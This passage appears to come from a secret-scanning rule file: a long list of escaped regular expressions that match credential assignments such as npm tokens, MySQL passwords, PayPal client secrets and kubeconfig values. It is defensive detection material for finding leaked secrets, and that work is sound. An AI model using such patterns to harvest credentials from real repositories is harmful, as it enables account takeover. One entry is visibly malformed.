\"(?i)[\\\"']?publish[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?publish[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?publish[_-]?access[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?project[_-]?config[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?prod[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?prod[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?prod[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?private[_-]?signing[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?pring[_-]?mail[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?preferred[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?prebuild[_-]?auth[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?postgresql[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?postgresql[_-]?db[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?postgres[_-]?env[_-]?postgres[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?postgres[_-]?env[_-]?postgres[_-]?db[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?plugin[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?plotly[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?places[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?places[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?pg[_-]?host[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?pg[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?personal[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?personal[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?percy[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?percy[_-]?project[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?paypal[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?passwordtravis[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?parse[_-]?js[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?pagerduty[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?packagecloud[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ossrh[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ossrh[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ossrh[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ossrh[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ossrh[_-]?jira[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?os[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?os[_-]?auth[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?org[_-]?project[_-]?gradle[_-]?sonatype[_-]?nexus[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?org[_-]?gradle[_-]?project[_-]?sonatype[_-]?nexus[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?openwhisk[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?open[_-]?whisk[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?onesignal[_-]?user[_-]?auth[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?onesignal[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?omise[_-]?skey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?omise[_-]?pubkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?omise[_-]?pkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?omise[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?okta[_-]?oauth2[_-]?clientsecret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?okta[_-]?oauth2[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?okta[_-]?client[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ofta[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ofta[_-]?region[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ofta[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?octest[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?octest[_-]?app[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?octest[_-]?app[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?oc[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?object[_-]?store[_-]?creds[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?object[_-]?store[_-]?bucket[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?object[_-]?storage[_-]?region[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?object[_-]?storage[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?oauth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?numbers[_-]?service[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?nuget[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?nuget[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?nuget[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?npm[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?npm[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?npm[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?npm[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?npm[_-]?auth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?npm[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?npm[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?now[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?non[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?node[_-]?pre[_-]?gyp[_-]?secretaccesskey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?node[_-]?pre[_-]?gyp[_-]?github[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?node[_-]?pre[_-]?gyp[_-]?accesskeyid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?node[_-]?env[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ngrok[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ngrok[_-]?auth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?nexuspassword[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?nexus[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?new[_-]?relic[_-]?beta[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?netlify[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?nativeevents[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mysqlsecret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mysqlmasteruser[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mysql[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mysql[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mysql[_-]?root[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mysql[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mysql[_-]?hostname[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mysql[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?my[_-]?secret[_-]?env[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?multi[_-]?workspace[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?multi[_-]?workflow[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?multi[_-]?disconnect[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?multi[_-]?connect[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?multi[_-]?bob[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?minio[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?minio[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mile[_-]?zero[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mh[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mh[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mg[_-]?public[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mg[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mapboxaccesstoken[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mapbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mapbox[_-]?aws[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mapbox[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mapbox[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?manifest[_-]?app[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?manifest[_-]?app[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mandrill[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?managementapiaccesstoken[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?management[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?manage[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?manage[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailgun[_-]?secret[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailgun[_-]?pub[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailgun[_-]?pub[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailgun[_-]?priv[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailgun[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailgun[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailgun[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailer[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailchimp[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailchimp[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mail[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?magento[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?magento[_-]?auth[_-]?username [\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?magento[_-]?auth[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?store[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?lottie[_-]?s3[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?lottie[_-]?happo[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?lottie[_-]?happo[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?looker[_-]?test[_-]?runner[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ll[_-]?shared[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ll[_-]?publish[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?linux[_-]?signing[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?linkedin[_-]?client[_-]?secretor lottie[_-]?s3[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?lighthouse[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?lektor[_-]?deploy[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?lektor[_-]?deploy[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?leanplum[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?kxoltsn3vogdop92m[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?kubeconfig[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?kubecfg[_-]?s3[_-]?path[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?kovan[_-]?private[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 